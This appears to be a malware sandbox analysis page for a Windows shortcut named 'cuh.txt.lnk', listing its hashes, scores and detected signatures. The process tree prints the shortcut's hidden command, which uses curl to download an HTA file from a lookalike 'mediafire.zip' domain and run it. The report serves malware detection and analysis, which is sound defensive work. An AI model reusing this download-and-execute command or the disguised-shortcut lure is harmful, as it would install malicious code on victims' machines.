Overview

overview

10

Static

static

1

cuh.txt.lnk

windows7-x64

3

cuh.txt.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    08-06-2024 21:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    cuh.txt.lnk

  • Size

    1KB

  • MD5

    3947296e1f311ad2bd25bb986e9d4622

  • SHA1

    57c1f9b221a150919dc23ce6f10ed5b8f74fbd12

  • SHA256

    6f8196f6de261c3b0d45e9b847ae3cf706d99732778a7f86b954ea23e3dd342b

  • SHA512

    24f5432807bbb1f867765738ddd3c391882a4fd49f19c9d34339f995de3bd07db8ec8ae0df7283e7e670d93c599b89c87ff64f0208a10d52412ab6407715fde1

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\cuh.txt.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2176
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.hta -o "C:\Users\Admin\AppData\Local\Temp\build.hta" && "C:\Users\Admin\AppData\Local\Temp\build.hta"
      2⤵
        PID:2656

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Replay Monitor

    Loading Replay Monitor...

    Downloads